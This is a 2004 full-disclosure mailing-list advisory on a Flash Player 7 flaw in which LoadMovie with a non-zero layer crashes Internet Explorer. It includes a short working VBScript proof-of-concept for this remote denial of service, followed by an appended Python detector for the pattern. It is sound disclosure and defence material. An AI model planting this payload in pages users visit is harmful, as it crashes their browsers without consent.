Message-ID: <000901c41bb1$b9ebdba0$a85ab350@fucku>
Date: Tue, 6 Apr 2004 10:32:41 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "full-disclosure" <full-disclosure@...ts.netsys.com>,
"SecurITeam News" <news@...uriteam.com>,
"securitytracker" <bugs@...uritytracker.com>,
"bugtraq" <bugtraq@...urityfocus.com>
Subject: Macromedia Flash Player 7.0 r19 - Null Pointer Assignment(Remote Crash)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Macromedia Flash Player
Vendors: http://www.macromedia.com
Version: 7.0 r19
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Macromedia Flash Player is a module/plugin that comes by default with a
Windows installation.
It is widely used across websites all around the world. It is stable, and its
designers made a few efforts to make it secure.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
Macromedia Flash Player has a flaw in the "LoadMovie" function.
The function is designed the following way: LoadMovie(layer as long, url as
string).
This function handles long strings, non-alphabetic chars and even an
overflow at a high layer number.
The only thing it crashes upon is loading a flash movie into a non-zero
layer index.
This means that:
LoadMovie 1,"c6ool.swf"
will crash the Internet Explorer window because of a null pointer assignment by
the flash module.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>
------------------- CUT HERE -------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Only the one who sees the invisible , Can do the Impossible."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
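
Added example, not part of the original advisory: a Python check that a web proxy or mail gateway could run over HTML to flag scripts that create the Flash ActiveX object and call LoadMovie with a non-zero layer, the condition described in section 2. The function names, verdict strings and the benign sample page are assumptions constructed for illustration; accepting the JScript `new ActiveXObject` form goes beyond the VBScript case shown in the post.

```python
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
# A Flash ActiveX object assigned to a variable (VBScript or JScript form).
CREATE_RE = re.compile(
    r"(\w+)\s*=\s*(?:CreateObject|new\s+ActiveXObject)\s*\(\s*"
    r"[\"']ShockwaveFlash\.ShockwaveFlash(?:\.\d+)?[\"']\s*\)", re.I)

# Constructed sample pages: the first mirrors the post's script, the second is benign.
SAMPLE_FLAGGED = """<html><script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script></html>"""
SAMPLE_BENIGN = """<html><script language=vbscript>
Set player = CreateObject("ShockwaveFlash.ShockwaveFlash")
player.LoadMovie 0, "intro.swf"
</script></html>"""


def parse_layer(text):
    """Return the layer as an int for a numeric literal, else None."""
    if re.fullmatch(r"[+-]?\d+", text):
        return int(text)
    m = re.fullmatch(r"(?:&H|0x)([0-9a-f]+)&?", text, re.I)
    return int(m.group(1), 16) if m else None


def find_loadmovie_calls(html):
    """Return (variable, layer_text, verdict) for each LoadMovie call worth a look."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        for var in sorted({m.group(1) for m in CREATE_RE.finditer(script)}):
            call_re = re.compile(
                r"\b" + re.escape(var) + r"\.LoadMovie\s*\(?\s*([^,()\s]+)\s*,", re.I)
            for call in call_re.finditer(script):
                layer = parse_layer(call.group(1))
                if layer is None:      # variable or expression: cannot decide statically
                    findings.append((var, call.group(1), "review: non-literal layer"))
                elif layer != 0:       # the condition the advisory reports as crashing
                    findings.append((var, call.group(1), "flag: non-zero layer"))
    return findings


if __name__ == "__main__":
    for page in (SAMPLE_FLAGGED, SAMPLE_BENIGN):
        print(find_loadmovie_calls(page))
```

A layer passed as a variable cannot be judged from the page source alone, so those calls are reported for review rather than flagged.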